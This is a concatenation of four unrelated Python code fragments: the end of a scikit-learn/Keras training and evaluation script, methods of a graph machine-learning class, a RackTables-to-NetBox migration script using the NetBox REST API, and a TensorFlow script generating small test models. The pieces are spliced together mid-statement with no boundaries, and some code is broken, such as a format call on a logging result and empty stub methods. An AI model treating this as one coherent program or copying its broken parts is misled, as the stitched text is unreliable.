test_split_options['labels'] = y else: raise ValueError("Stratified shuffle split is not " "applicable on empty target values!") X_train, X_test, y_train, y_test, groups_train, groups_test = \ train_test_split_none(X, y, groups, **test_split_options) exp_scheme = params['experiment_schemes']['selected_exp_scheme'] # handle validation (second) split if exp_scheme == 'train_val_test': val_split_options = (params['experiment_schemes'] ['val_split']['split_algos']) if val_split_options['shuffle'] == 'group': val_split_options['labels'] = groups_train if val_split_options['shuffle'] == 'stratified': if y_train is not None: val_split_options['labels'] = y_train else: raise ValueError("Stratified shuffle split is not " "applicable on empty target values!") X_train, X_val, y_train, y_val, groups_train, groups_val = \ train_test_split_none(X_train, y_train, groups_train, **val_split_options) # train and eval if hasattr(estimator, 'config') and hasattr(estimator, 'model_type'): if exp_scheme == 'train_val_test': estimator.fit(X_train, y_train, validation_data=(X_val, y_val)) else: estimator.fit(X_train, y_train, validation_data=(X_test, y_test)) else: estimator.fit(X_train, y_train) if isinstance(estimator, KerasGBatchClassifier): scores = {} steps = estimator.prediction_steps batch_size = estimator.batch_size data_generator = estimator.data_generator_ scores, predictions, y_true = _evaluate_keras_and_sklearn_scores( estimator, data_generator, X_test, y=y_test, sk_scoring=scoring, steps=steps, batch_size=batch_size, return_predictions=bool(outfile_y_true)) else: scores = {} if hasattr(estimator, 'model_') \ and hasattr(estimator.model_, 'metrics_names'): batch_size = estimator.batch_size score_results = estimator.model_.evaluate(X_test, y=y_test, batch_size=batch_size, verbose=0) metrics_names = estimator.model_.metrics_names if not isinstance(metrics_names, list): scores[metrics_names] = score_results else: scores = dict(zip(metrics_names, score_results)) if hasattr(estimator, 'predict_proba'): predictions = estimator.predict_proba(X_test) else: predictions = estimator.predict(X_test) y_true = y_test sk_scores = _score(estimator, X_test, y_test, scorer) scores.update(sk_scores) # handle output if outfile_y_true: try: pd.DataFrame(y_true).to_csv(outfile_y_true, sep='\t', index=False) pd.DataFrame(predictions).astype(np.float32).to_csv( outfile_y_preds, sep='\t', index=False, float_format='%g', chunksize=10000) except Exception as e: print("Error in saving predictions: %s" % e) # handle output for name, score in scores.items(): scores[name] = [score] df = pd.DataFrame(scores) df = df[sorted(df.columns)] df.to_csv(path_or_buf=outfile_result, sep='\t', header=True, index=False) memory.clear(warn=False) if outfile_object: dump_model_to_h5(estimator, outfile_object) if __name__ == '__main__': aparser = argparse.ArgumentParser() aparser.add_argument("-i", "--inputs", dest="inputs", required=True) aparser.add_argument("-e", "--estimator", dest="infile_estimator") aparser.add_argument("-X", "--infile1", dest="infile1") aparser.add_argument("-y", "--infile2", dest="infile2") aparser.add_argument("-O", "--outfile_result", dest="outfile_result") aparser.add_argument("-o", "--outfile_object", dest="outfile_object") aparser.add_argument("-l", "--outfile_y_true", dest="outfile_y_true") aparser.add_argument("-p", "--outfile_y_preds", dest="outfile_y_preds") aparser.add_argument("-g", "--groups", dest="groups") aparser.add_argument("-r", "--ref_seq", dest="ref_seq") aparser.add_argument("-b", "--intervals", dest="intervals") aparser.add_argument("-t", "--targets",
else: data_index_maps = {} data_arrays = {} # TODO: What other convenience attributes do we need? self._nodes_by_type = None # This stores the feature vectors per node type as numpy arrays self._node_attribute_arrays = data_arrays # This stores the map between node ID and index in the attribute arrays self._node_index_maps = data_index_maps def __repr__(self): directed_str = "Directed" if self.is_directed() else "Undirected" s = "{}: {} multigraph\n".format(type(self).__name__, directed_str) s += " Nodes: {}, Edges: {}\n".format( self.number_of_nodes(), self.number_of_edges() ) return s def _get_node_type(self, node_data): node_type = node_data.get(self._node_type_attr) if node_type is None: node_type = self._node_type_default node_data[self._node_type_attr] = node_type return node_type def _get_edge_type(self, edge_data): edge_type = edge_data.get(self._edge_type_attr) if edge_type is None: edge_type = self._edge_type_default edge_data[self._edge_type_attr] = edge_type return edge_type def check_graph_for_ml(self, features=True): """ Checks if all properties required for machine learning training/inference are set up. An error will be raised if the graph is not correctly setup. """ # TODO: This are simple tests and miss many problems that could arise, improve! # Check features on the nodes: if features and len(self._node_attribute_arrays) == 0: raise RuntimeError( "This StellarGraph has no numeric feature attributes for nodes" "Node features are required for machine learning" ) # TODO: check the schema # TODO: check the feature node_ids against the graph node ids? def get_index_for_nodes(self, nodes, node_type=None): """ Get the indices for the specified node or nodes. If the node type is not specified the node types will be found for all nodes. It is therefore important to supply the ``node_type`` for this method to be fast. Args: n: (list or hashable) Node ID or list of node IDs node_type: (hashable) the type of the nodes. Returns: Numpy array containing the indices for the requested nodes. """ if not is_real_iterable(nodes): nodes = [nodes] # Get the node type if not specified. if node_type is None: node_types = { self._get_node_type(self._graph.nodes[n]) for n in nodes if n is not None } if len(node_types) > 1: raise ValueError("All nodes must be of the same type.") if len(node_types) == 0: raise ValueError( "At least one node must be given if node_type not specified" ) node_type = node_types.pop() # Get index for nodes of this type nt_id_to_index = self._node_index_maps[node_type] node_indices = [nt_id_to_index.get(n) for n in nodes] return node_indices def node_features(self, nodes, node_type=None): """ Get the numeric feature vectors for the specified node or nodes. If the node type is not specified the node types will be found for all nodes. It is therefore important to supply the ``node_type`` for this method to be fast. Args: n: (list or hashable) Node ID or list of node IDs node_type: (hashable) the type of the nodes. Returns: Numpy array containing the node features for the requested nodes. """ # TODO: add @property decorator if not is_real_iterable(nodes): nodes = [nodes] # Get the node type if not specified. if node_type is None: node_types = { self._get_node_type(self._graph.nodes[n]) for n in nodes if n is not None } if len(node_types) > 1: raise ValueError("All nodes must be of the same type.") if len(node_types) == 0: raise ValueError( "At least one node must be given if node_type not specified" ) node_type = node_types.pop() # Check node_types if ( node_type not in self._node_attribute_arrays or node_type not in self._node_index_maps ): raise ValueError(f"Features not found for node type '{node_type}'") # Edge case: if we are given no nodes, what do we do? if len(nodes) == 0: feature_size = self._node_attribute_arrays[node_type].shape[1] return np.empty((0, feature_size)) # Get index for nodes of this type nt_id_to_index = self._node_index_maps[node_type] node_indices = [nt_id_to_index.get(n) for n in nodes] if None in node_indices: problem_nodes = [ node for node, index in zip(nodes, node_indices) if index is None ] raise ValueError( "Could not find features for nodes with IDs {}.".format(problem_nodes) ) features = self._node_attribute_arrays[node_type][node_indices] return features def node_feature_sizes(self, node_types=None): """ Get the feature sizes for the specified node types. Args: node_types: (list) A list of node types. If None all current node types will be used. Returns: A dictionary of node type and integer feature size. """ # TODO: unit test! if not node_types: node_types = self.node_types self.check_graph_for_ml(features=True) fsize = {nt: self._node_attribute_arrays[nt].shape[1] for nt in node_types} return fsize def nodes_of_type(self, node_type=None): """ Get the nodes of the graph with the specified node types. Args: node_type: Returns: A list of node IDs with type node_type """ # TODO: unit test! if node_type is None: return list(self) else: return [ n for n, ndata in self._graph.nodes(data=True) if self._get_node_type(ndata) == node_type ] def node_type(self, node): """ Get the type of the node Args: node: Node ID Returns: Node type """ return self._get_node_type(self._graph.nodes[node]) @property def node_types(self): """ Get a list of all node types in the graph. Returns: set of types """ # TODO: unit test! # TODO: create a schmea when we geenrate _node_attribute_arrays and use it? if len(self._node_attribute_arrays) > 0: return set(self._node_attribute_arrays.keys()) else: return { self._get_node_type(ndata) for n, ndata in self._graph.nodes(data=True) } def info(self, show_attributes=True, sample=None): """ Return an information string summarizing information on the current graph. This includes node and edge type information and their attributes. Note: This requires processing all nodes and edges and could take a long time for a large graph. Args: sample (int): To speed up the graph analysis, use only a random sample of this many nodes and edges. Returns: An information string. """ directed_str = "Directed" if self.is_directed() else "Undirected" s = "{}: {} multigraph\n".format(type(self).__name__, directed_str) s += " Nodes: {}, Edges: {}\n".format( self.number_of_nodes(), self.number_of_edges() ) # Sample the nodes for our analysis if sample: all_nodes = list(self._graph.nodes) snodes = random.sample(all_nodes, sample) else: snodes = None gs = self.create_graph_schema(create_type_maps=False, nodes=snodes) def is_of_edge_type(e, edge_type): et2 = ( self._get_node_type(self._graph.nodes[e[0]]), self._get_edge_type(self._graph.edges[e]), self._get_node_type(self._graph.nodes[e[1]]), ) return et2 == edge_type # Go over all node types s += "\n Node types:\n" for nt in gs.node_types: # Filter nodes by type nt_nodes = [ ndata for n, ndata in self._graph.nodes(data=True) if self._get_node_type(ndata) == nt ] s += " {}: [{}]\n".format(nt, len(nt_nodes)) # Get the attributes for this node type attrs = set(it.chain(*[ndata.keys() for ndata in nt_nodes])) attrs.discard(self._node_type_attr) if show_attributes and len(attrs) > 0: s += " Attributes: {}\n".format(attrs) s += " Edge types: " s += ", ".join(["{}-{}->{}".format(*e) for e in gs.schema[nt]]) + "\n" s += "\n Edge types:\n" for et in gs.edge_types: # Filter edges by type et_edges = [ e[3] for e in self._graph.edges(keys=True, data=True) if is_of_edge_type(e[:3], et) ] if len(et_edges) > 0: s += " {et[0]}-{et[1]}->{et[2]}: [{len}]\n".format( et=et, len=len(et_edges) ) # Get the attributes for this edge type attrs = set(it.chain(*[edata.keys() for edata in et_edges])) attrs.discard(self._edge_type_attr) if show_attributes and len(attrs) > 0: s += " Attributes: {}\n".format(attrs) return s def create_graph_schema(self, create_type_maps=True, nodes=None): """ Create graph schema in dict of dict format from current graph. Note the assumption we make that there is only one edge of a particular edge type per node pair. This means that specifying an edge by node0, node1 and edge type is unique. Arguments: create_type_maps (bool): If True quick lookup of node/edge types is created in the schema. This can be slow. nodes (list): A list of node IDs to use to build schema. This must represent all node types and all edge types in the graph. If specified, `create_type_maps` must be False. If not specified, all nodes and edges in the graph are used. Returns: GraphSchema object. """ if nodes is None: nodes = self.nodes() edges = self.edges(triple=True) elif create_type_maps is False: edges = ( (src, dst, self._get_edge_type(data)) for src, dst, data in self._graph.edges(nodes, data=True) ) else: raise ValueError("Creating type maps for subsampled nodes is not supported") # Create node type index list node_types = sorted({self.node_type(n) for n in nodes}, key=str) graph_schema = {nt: set() for nt in node_types} # Create edge type index list edge_types = set() for n1, n2, edge_type in edges: # Edge type tuple node_type_1 = self.node_type(n1) node_type_2 = self.node_type(n2) # Add edge
#!/usr/bin/env python3 # -*- coding: utf-8 -*- __version__ = 1.00 import os import json import logging from os import replace import pprint import pymysql import pynetbox import requests import slugify import socket import struct import urllib3 import urllib.parse import re from time import sleep import yaml import copy import datetime import re import ipcalc class Migrator: def slugify(self, text): return slugify.slugify(text, max_length=50) def create_tenant_group(self, name): pass def create_tenant(self, name, tenant_group=None): logger.info("Creating tenant {}").format(name) tenant = {"name": name, "slug": self.slugify(name)} if tenant_group: tenant["tenant_group"] = netbox.tenancy.tenant_groups.all() return netbox.tenancy.tenants.create(tenant) def create_region(self, name, parent=None): netbox.dcim.regions.create() if not parent: pass pass def create_site( self, name, region, status, physical_address, facility, shipping_address, contact_phone, contact_email, contact_name, tenant, time_zone, ): slug = self.slugify(name) pass # Re-Enabled SSL verification # urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class NETBOX(object): def __init__(self, pynetboxobj): self.base_url = "{}/api".format(config["NetBox"]["NETBOX_HOST"]) self.py_netbox = pynetboxobj self.all_ips = None self.all_prefixes = None # Create HTTP connection pool self.s = requests.Session() # SSL verification self.s.verify = True # Define REST Headers headers = { "Content-Type": "application/json", "Accept": "application/json; indent=4", "Authorization": "Token {0}".format(config["NetBox"]["NETBOX_TOKEN"]), } self.s.headers.update(headers) self.device_types = None def uploader(self, data, url, method="POST"): logger.debug("HTTP Request: {} - {} - {}".format(method, url, data)) try: request = requests.Request(method, url, data=json.dumps(data)) prepared_request = self.s.prepare_request(request) r = self.s.send(prepared_request) logger.debug(f"HTTP Response: {r.status_code!s} - {r.reason}") if r.status_code not in [200, 201]: logger.debug(r.text) r.raise_for_status() r.close() except: logger.debug("POST attempt failed") try: if r: return_obj = r.json except: sleep(2) return {} return return_obj def uploader2(self, data, url, method="POST"): # ignores failures. method = "POST" logger.debug("HTTP Request: {} - {} - {}".format(method, url, data)) request = requests.Request(method, url, data=json.dumps(data)) prepared_request = self.s.prepare_request(request) r = self.s.send(prepared_request) logger.debug(f"HTTP Response: {r.status_code!s} - {r.reason}") r.close() logger.debug(r.text) def fetcher(self, url): method = "GET" logger.debug("HTTP Request: {} - {}".format(method, url)) max_attempts = 3 current_attempt = 0 while current_attempt < max_attempts: try: request = requests.Request(method, url) prepared_request = self.s.prepare_request(request) r = self.s.send(prepared_request) logger.debug(f"HTTP Response: {r.status_code} - {r.reason}") r.raise_for_status() r.close() except: sleep(2) logger.debug("fetch attempt failed") try: if r: if r.status_code == 200: return r.text except: test = "" current_attempt = current_attempt + 1 logger.debug("failed to get {} 3 times".format(url)) exit(1) def post_subnet(self, data): url = self.base_url + "/ipam/prefixes/" exists = self.check_for_subnet(data) if exists[0]: logger.info("prefix/subnet: {} already exists, updating with Put".format(data["prefix"])) method = "PUT" url = "{}{}/".format(url, exists[1]["id"]) self.uploader(data, url, method) else: logger.info("Posting data to {}".format(url)) self.uploader(data, url) def check_for_subnet(self, data): url_safe_ip = urllib.parse.quote_plus(data["prefix"]) url = self.base_url + "/ipam/prefixes/?prefix={}".format(url_safe_ip) logger.info("checking for existing prefix in netbox: {}".format(url)) check = self.fetcher(url) json_obj = json.loads(check) # logger.debug("response: {}".format(check)) if json_obj["count"] == 1: return True, json_obj["results"][0] elif json_obj["count"] > 1: logger.error("duplicate prefixes exist. cleanup!") exit(2) else: return False, False def check_for_ip(self, data): url_safe_ip = urllib.parse.quote_plus(data["address"]) url = self.base_url + "/ipam/ip-addresses/?address={}".format(url_safe_ip) logger.info("checking for existing ip in netbox: {}".format(url)) check = self.fetcher(url) json_obj = json.loads(check) # logger.debug("response: {}".format(check)) if json_obj["count"] == 1: return True elif json_obj["count"] > 1: logger.error("duplicate ip's exist. cleanup!") exit(2) else: return False def device_type_checker(self, device_model_name, attempt_import=True): if not self.device_types: self.device_types = {str(item.slug): dict(item) for item in self.py_netbox.dcim.device_types.all()} if not attempt_import: self.device_types = {str(item.slug): dict(item) for item in self.py_netbox.dcim.device_types.all()} slug_id = None if str(device_model_name) in device_type_map_preseed["by_key_name"].keys(): logger.debug("hardware match") # print(str(devicedata['hardware'])) nb_slug = device_type_map_preseed["by_key_name"][str(device_model_name)]["slug"] if nb_slug in self.device_types: logger.debug("found template in netbox") slug_id = self.device_types[nb_slug]["id"] elif attempt_import: logger.debug("did not find matching device template in netbox, attempting import") self.post_device_type(device_model_name, device_type_map_preseed["by_key_name"][str(device_model_name)]) return self.device_type_checker(device_model_name, False) else: logger.debug("did not find matching device template in netbox") if not config["Misc"]["SKIP_DEVICES_WITHOUT_TEMPLATE"] == True: logger.debug("device with no matching template by slugname {nb_slug} found") exit(112) else: logger.debug("hardware type missing: {}".format(device_model_name)) return slug_id def post_ip(self, data): url = self.base_url + "/ipam/ip-addresses/" exists = self.check_for_ip(data) if exists: logger.info("ip: {} already exists, skipping".format(data["address"])) else: logger.info("Posting IP data to {}".format(url)) self.uploader(data, url) def get_sites(self): url = self.base_url + "/dcim/sites/" resp = self.fetcher(url) return json.loads(resp)["results"] def get_sites_keyd_by_description(self): sites = self.get_sites() resp = {} for site in sites: if site["description"] == "": logger.debug("site: {} {} has no description set, skipping".format(site["display"], site["url"])) else: if not site["description"] in resp.keys(): resp[site["description"]] = site else: logger.debug("duplicate description detected! {}".format(site["description"])) return resp def post_rack(self, data): url = self.base_url + "/dcim/racks/" exists = self.check_if_rack_exists(data) if exists[0]: logger.info("rack: {} already exists, updating".format(data["name"])) url = url + "{}/".format(exists[1]) self.uploader(data, url, "PUT") else: logger.info("Posting rack data to {}".format(url)) self.uploader(data, url) def check_if_rack_exists(self, data): url_safe_ip = urllib.parse.quote_plus(data["name"]) url = self.base_url + "/dcim/racks/?name={}".format(url_safe_ip) logger.info("checking for existing rack in netbox: {}".format(url)) check = self.fetcher(url) json_obj = json.loads(check) if json_obj["count"] == 0: return False, False else: for rack in json_obj["results"]: if rack["site"]["id"] == data["site"]: return True, rack["id"] return False # elif json_obj["count"] > 1: # logger.error("duplicate ip's exist. cleanup!") # exit(2) # else: # return False def post_tag(self, tag, description): url = self.base_url + "/extras/tags/" data = {} data["name"] = str(tag) data["slug"] = str(tag).lower().replace(" ", "_") if not description is None: data["description"] = description self.uploader2(data, url) def get_tags_key_by_name(self): url = self.base_url + "/extras/tags/?limit=10000" resp = json.loads(self.fetcher(url)) tags = {} for tag in resp["results"]: tags[tag["name"]] = tag logger.debug(tags) return tags def check_for_vlan_group(self, group_name): url = self.base_url + "/ipam/vlan-groups/?name={}".format(group_name) logger.info("checking for vlan-group in netbox: {}".format(url)) check = self.fetcher(url) json_obj = json.loads(check) # logger.debug("response: {}".format(check)) if json_obj["count"] == 1: logger.debug("found matching group") return True, json_obj["results"][0] elif json_obj["count"] > 1: logger.debug("duplcate groups detected, fix this") logger.debug(json_obj) exit(1) else: return False, False def get_vlan_groups_by_name(self): url = self.base_url + "/ipam/vlan-groups/?limit=10000" resp = json.loads(self.fetcher(url)) groups = {} for group in resp["results"]: if group["name"] in groups.keys(): logger.debug("duplicate group name exists! fix this. group: {}".format(group["name"])) exit(1) groups[group["name"]] = group logger.debug(groups) return groups def post_vlan_group(self, group_name, rt_id): url = self.base_url + "/ipam/vlan-groups/" data = {} data["name"] = str(group_name) data["description"] = str(group_name) slug_prep = str(group_name).lower().replace(" ", "-").replace(":", "") data["slug"] = slugify.slugify(slug_prep, separator="_") data["custom_fields"] = {"rt_id": rt_id} pp.pprint(data) if not self.check_for_vlan_group(group_name)[0]: self.uploader2(data, url) def check_for_vlan(self, data): url = self.base_url + "/ipam/vlans/?vid={}&group_id={}".format(data["vid"], data["group"]) logger.info("checking for vlan in netbox: {}".format(url)) check = self.fetcher(url) json_obj = json.loads(check) # logger.debug("response: {}".format(check)) if json_obj["count"] == 1: logger.debug("matching vlan found") return True, json_obj["results"][0] elif json_obj["count"] > 1: logger.debug("duplcate vlans detected, fix this") logger.debug(json_obj) exit(1) else: return False, False def get_nb_vlans(self): vlans_by_netbox_id = {} url = self.base_url + "/ipam/vlans/?limit=10000" resp = json.loads(self.fetcher(url)) for vlan in resp["results"]: vlans_by_netbox_id[vlan["id"]] = vlan return vlans_by_netbox_id def post_vlan(self, data): url = self.base_url + "/ipam/vlans/" exists = self.check_for_vlan(data) if exists[0]: logger.info("vlan: {} already exists, updating".format(data["name"])) url = url + "{}/".format(exists[1]["id"]) self.uploader(data, url, "PUT") else: logger.info("Posting vlan data to {}".format(url)) self.uploader(data, url) def post_device_type(self, device_type_key, device_type): logger.debug("post_device_type:") logger.debug(device_type_key) logger.debug(device_type) data = {} if "device_template_data" in device_type.keys(): import_source = device_type["device_template_data"] else: import_source = device_type if "yaml_file" in import_source.keys(): filename = import_source["yaml_file"] with open(filename, "r") as stream: try: data = yaml.safe_load(stream) except yaml.YAMLError as exc: logger.debug(f"failed to load {import_source['yaml_file']} for {device_type_key} template") logger.debug(exc) if "yaml_url" in import_source.keys(): try: resp = requests.get(import_source["yaml_url"]) data = yaml.safe_load(resp.text) except: logger.debug(f"failed to load {import_source['yaml_url']} for {device_type_key} template") pp.pprint(data) man_data = {"name": data["manufacturer"], "slug": self.slugFormat(data["manufacturer"])} self.createManufacturers([man_data], py_netbox) data["manufacturer"] = man_data self.createDeviceTypes([data], py_netbox) self.device_types = {str(item.slug): dict(item) for item in self.py_netbox.dcim.device_types.all()} def post_device(self, data, py_netbox=None, has_problems=False): if not py_netbox: py_netbox = self.py_netbox needs_updating = False device_check1 = [item for item in py_netbox.dcim.devices.filter(cf_rt_id=data["custom_fields"]["rt_id"])] if len(device_check1) == 1: if device_check1[0]["custom_fields"]["rt_id"] == data["custom_fields"]["rt_id"]: logger.debug("device already in netbox (via rt_id). sending to update checker") needs_updating = True matched_by = "cf_rt_id" if not needs_updating: if "asset_tag" in data.keys(): device_check2 = [str(item) for item in py_netbox.dcim.devices.filter(asset_tag=data["asset_tag"])] if len(device_check2) == 1: logger.debug("device already in netbox (via asset_tag). sending to update checker") needs_updating = True matched_by = "asset_tag" if not needs_updating: device_check3 = [str(item) for item in py_netbox.dcim.devices.filter(name=data["name"])] if len(device_check3) == 1: logger.debug("device already in netbox (via name). sending to update checker") needs_updating = True matched_by = "name" if needs_updating: self.update_device(data, matched_by, py_netbox, has_problems) else: try: if has_problems: data["status"] = "failed" py_netbox.dcim.devices.create(data) except pynetbox.RequestError as e: logger.debug("matched request error") pp.pprint(e.args) if "device with this Asset tag already exists" in str(e): logger.debug("matched by asset tag") matched_by = "asset_tag" needs_updating = True elif "device with this name already exists" in str(e): logger.debug("matched by name") matched_by = "name" needs_updating = True if needs_updating: # update existing device self.update_device(data, matched_by, py_netbox, has_problems) def update_device(self, data, match_type, py_netbox, has_problems=False): if match_type == "cf_rt_id": device = py_netbox.dcim.devices.get(cf_rt_id=data["custom_fields"]["rt_id"]) elif match_type == "asset_tag": device
test more simple. detections = sorted(detections[0, 0, :, :], cmp=lambda x, y: -1 if x[1] < y[1] and x[2] < y[2] else 0) np.save('ssd_mobilenet_v1_coco.detection_out.npy', detections) ################################################################################ inp = tf.placeholder(tf.float32, [1, 2, 3, 4], 'input') conv = tf.layers.conv2d(inp, filters=5, kernel_size=[1, 1], activation=tf.nn.relu, bias_initializer=tf.random_normal_initializer()) flattened = tf.reshape(conv, [1, -1], 'reshaped') biases = tf.Variable(tf.random_normal([10]), name='matmul_biases') weights = tf.Variable(tf.random_normal([2*3*5, 10]), name='matmul_weights') mm = tf.matmul(flattened, weights) + biases save(inp, mm, 'nhwc_reshape_matmul') ################################################################################ inp = tf.placeholder(tf.float32, [1, 2, 3, 4], 'input') conv = tf.layers.conv2d(inp, filters=5, kernel_size=[1, 1], activation=tf.nn.relu, bias_initializer=tf.random_normal_initializer()) transposed = tf.transpose(conv, [0, 1, 2, 3]) flattened = tf.reshape(transposed, [1, -1], 'reshaped') biases = tf.Variable(tf.random_normal([10]), name='matmul_biases') weights = tf.Variable(tf.random_normal([2*3*5, 10]), name='matmul_weights') mm = tf.matmul(flattened, weights) + biases save(inp, flattened, 'nhwc_transpose_reshape_matmul') ################################################################################ inp = tf.placeholder(tf.float32, [1, 6, 5, 3], 'input') conv = tf.layers.conv2d(inputs=inp, filters=3, kernel_size=[1, 1], activation=tf.nn.relu, bias_initializer=tf.random_normal_initializer()) save(inp, conv, 'uint8_single_conv', quantize=True) runModel(inp, conv.name, 'uint8_single_conv') ################################################################################ inp = tf.placeholder(tf.float32, [1, 4, 4, 1], 'input') conv = tf.layers.conv2d(inp, filters=3, kernel_size=[3, 3], padding='SAME') pool = tf.layers.average_pooling2d(conv, pool_size=3, strides=1, padding='SAME') save(inp, pool, 'ave_pool_same') ################################################################################ inp = tf.placeholder(tf.float32, [1, 4, 6, 1], 'input') conv = tf.layers.conv2d(inp, filters=3, kernel_size=[1, 1], padding='SAME') sliced = tf.slice(conv, [0, 1, 2, 0], [-1, 3, 4, 1]) save(inp, sliced, 'slice_4d') ################################################################################ inp = tf.placeholder(tf.float32, [1, 4, 4, 1], 'input') # ky kx out in deconv_weights = tf.Variable(tf.random_normal([3, 3, 2, 1], dtype=tf.float32)) deconv = tf.nn.conv2d_transpose(inp, deconv_weights, output_shape=[1, 4, 4, 2], strides=[1, 1, 1, 1], padding='SAME') leakyRelu = tf.nn.leaky_relu(deconv, alpha=0.2) save(inp, leakyRelu, 'deconvolution_same') # ################################################################################ inp = tf.placeholder(tf.float32, [1, 3, 3, 1], 'input') deconv_weights = tf.Variable(tf.random_normal([3, 3, 2, 1], dtype=tf.float32)) deconv = tf.nn.conv2d_transpose(inp, deconv_weights, output_shape=[1, 5, 5, 2], strides=[1, 2, 2, 1], padding='SAME') save(inp, deconv, 'deconvolution_stride_2_same') ################################################################################ inp = tf.placeholder(tf.float32, [1, 3, 2, 1], 'input') deconv_weights = tf.Variable(tf.random_normal([3, 3, 2, 1], dtype=tf.float32)) deconv = tf.nn.conv2d_transpose(inp, deconv_weights, output_shape=[1, 8, 6, 2], strides=[1, 2, 2, 1], padding='VALID') save(inp, deconv, 'deconvolution_adj_pad_valid') ################################################################################ inp = tf.placeholder(tf.float32, [1, 2, 2, 1], 'input') deconv_weights = tf.Variable(np.ones([3, 3, 1, 1]), dtype=tf.float32) deconv = tf.nn.conv2d_transpose(inp, deconv_weights, output_shape=[1, 4, 4, 1], strides=[1, 2, 2, 1], padding='SAME') save(inp, deconv, 'deconvolution_adj_pad_same') ################################################################################ inp = tf.placeholder(tf.float32, [1, 3, 4, 5], 'input') gamma = tf.Variable(tf.random_normal([5], dtype=tf.float32)) beta = tf.Variable(tf.random_normal([5], dtype=tf.float32)) bn = tf.nn.fused_batch_norm(inp, gamma, beta, epsilon=1e-5, is_training=True)[0] save(inp, bn, 'mvn_batch_norm') ################################################################################ inp = tf.placeholder(tf.float32, [1, 1, 1, 5], 'input') gamma = tf.Variable(tf.random_normal([5], dtype=tf.float32)) beta = tf.Variable(tf.random_normal([5], dtype=tf.float32)) bn = tf.nn.fused_batch_norm(inp, gamma, beta, epsilon=1e-5, is_training=True)[0] save(inp, bn, 'mvn_batch_norm_1x1') ################################################################################ inp = tf.placeholder(tf.float32, [1, 2, 3, 4], 'input') bn = tf.layers.batch_normalization(inp, training=False, fused=False, name='unfused_batch_norm', beta_initializer=tf.random_normal_initializer(), gamma_initializer=tf.random_normal_initializer(), moving_mean_initializer=tf.random_uniform_initializer(-2, 1), moving_variance_initializer=tf.random_uniform_initializer(0.1, 2),) save(inp, bn, 'unfused_batch_norm', optimize=False) ################################################################################ inp = tf.placeholder(tf.float32, [1, 2, 3, 4], 'input') bn = tf.layers.batch_normalization(inp, training=False, fused=True, name='fused_batch_norm_no_gamma', beta_initializer=tf.random_normal_initializer(), scale=False, moving_mean_initializer=tf.random_uniform_initializer(-2, 1), moving_variance_initializer=tf.random_uniform_initializer(0.1, 2),) save(inp, bn, 'fused_batch_norm_no_gamma', optimize=False) ################################################################################ inp = tf.placeholder(tf.float32, [1, 2, 3, 4], 'input') bn = tf.layers.batch_normalization(inp, training=False, fused=False, name='unfused_batch_norm_no_gamma', beta_initializer=tf.random_normal_initializer(), scale=False, moving_mean_initializer=tf.random_uniform_initializer(-2, 1), moving_variance_initializer=tf.random_uniform_initializer(0.1, 2),) save(inp, bn, 'unfused_batch_norm_no_gamma', optimize=False) ################################################################################ inp = tf.placeholder(tf.float32, [1, 2, 3], 'input') flatten = tf.contrib.layers.flatten(inp) save(inp, flatten, 'unfused_flatten', optimize=False) ################################################################################ inp = tf.placeholder(tf.float32, [None, 2, 3], 'input') flatten = tf.contrib.layers.flatten(inp) save(inp, flatten, 'unfused_flatten_unknown_batch', optimize=False) ################################################################################ inp = tf.placeholder(tf.float32, [1, 2, 3, 4], 'input') relu = tf.maximum(inp, 0.01 * inp, name='leaky_relu') * 2 save(inp, relu, 'leaky_relu_order1', optimize=False) ################################################################################ inp = tf.placeholder(tf.float32, [1, 2, 3, 4], 'input') relu = tf.maximum(inp, inp * 0.01, name='leaky_relu') * 2 save(inp, relu, 'leaky_relu_order2', optimize=False) ################################################################################ inp = tf.placeholder(tf.float32, [1, 2, 3, 4], 'input') relu = tf.maximum(0.01 * inp, inp, name='leaky_relu') * 2 save(inp, relu, 'leaky_relu_order3', optimize=False) ################################################################################ from tensorflow import keras as K model = K.models.Sequential() model.add(K.layers.Softmax(name='keras_softmax', input_shape=(2, 3, 4))) sess = K.backend.get_session() sess.as_default() save(sess.graph.get_tensor_by_name('keras_softmax_input:0'), sess.graph.get_tensor_by_name('keras_softmax/truediv:0'), 'keras_softmax', optimize=False) ################################################################################ model = K.models.Sequential() model.add(K.layers.Conv2D(filters=4, kernel_size=1, data_format='channels_last', name='keras_mobilenet_head_conv', input_shape=(2, 3, 4))) model.add(K.layers.GlobalAveragePooling2D(name='keras_mobilenet_head_pool')) model.add(K.layers.Reshape((1, 1, 4), name='keras_mobilenet_head_reshape')) sess = K.backend.get_session() sess.as_default() save(sess.graph.get_tensor_by_name('keras_mobilenet_head_conv_input:0'), sess.graph.get_tensor_by_name('keras_mobilenet_head_reshape/Reshape:0'), 'keras_mobilenet_head', optimize=False) ################################################################################ def keras_relu6(x): return K.activations.relu(x, max_value=6) inp = K.Input(shape=(2, 3, 4), name='keras_relu6_input') relu = K.layers.Activation(keras_relu6, name='keras_relu6')(inp) model = K.Model(inp, relu) sess = K.backend.get_session() sess.as_default() save(sess.graph.get_tensor_by_name('keras_relu6_input:0'), sess.graph.get_tensor_by_name('keras_relu6/clip_by_value:0'), 'keras_relu6', optimize=False) ################################################################################ inp = tf.placeholder(tf.float32, [2, 3], 'input') max_node = tf.clip_by_value(inp, clip_value_min=0, clip_value_max=1) save(inp, max_node, 'clip_by_value') ################################################################################ inp = tf.placeholder(tf.float32, [2, 3, 4, 5], 'input') reduced = tf.reduce_mean(inp, axis=[1, 2], keepdims=True) save(inp, reduced, 'reduce_mean') ################################################################################ inp = tf.placeholder(tf.float32, [2, 3, 4, 5], 'input') reduced = tf.reduce_sum(inp, axis=[1, 2], keepdims=True) save(inp, reduced, 'reduce_sum') ################################################################################ inp = tf.placeholder(tf.float32, [2, 3, 4, 5], 'input') reduced = tf.reduce_sum(inp, axis=[2], keepdims=False) save(inp, reduced, 'sum_pool_by_axis') ################################################################################ inp = tf.placeholder(tf.float32, [2, 3, 4, 5], 'input') pool = tf.layers.average_pooling2d(inp, pool_size=1, strides=1, padding='SAME') l2norm = tf.nn.l2_normalize(pool, axis=-1) l2norm = tf.nn.l2_normalize(l2norm, axis=[2, 3, 1]) save(inp, l2norm, 'l2_normalize') ################################################################################ inp = tf.placeholder(tf.float32, [2, 3, 4], 'input') l2norm = tf.nn.l2_normalize(inp, axis=1) l2norm = tf.nn.l2_normalize(l2norm, axis=-1) l2norm = tf.nn.l2_normalize(l2norm, axis=[0, 1]) save(inp, l2norm, 'l2_normalize_3d') ################################################################################ model = K.models.Sequential() model.add(K.layers.Conv2DTranspose(filters=4, kernel_size=3, strides=(2, 2), data_format='channels_last', 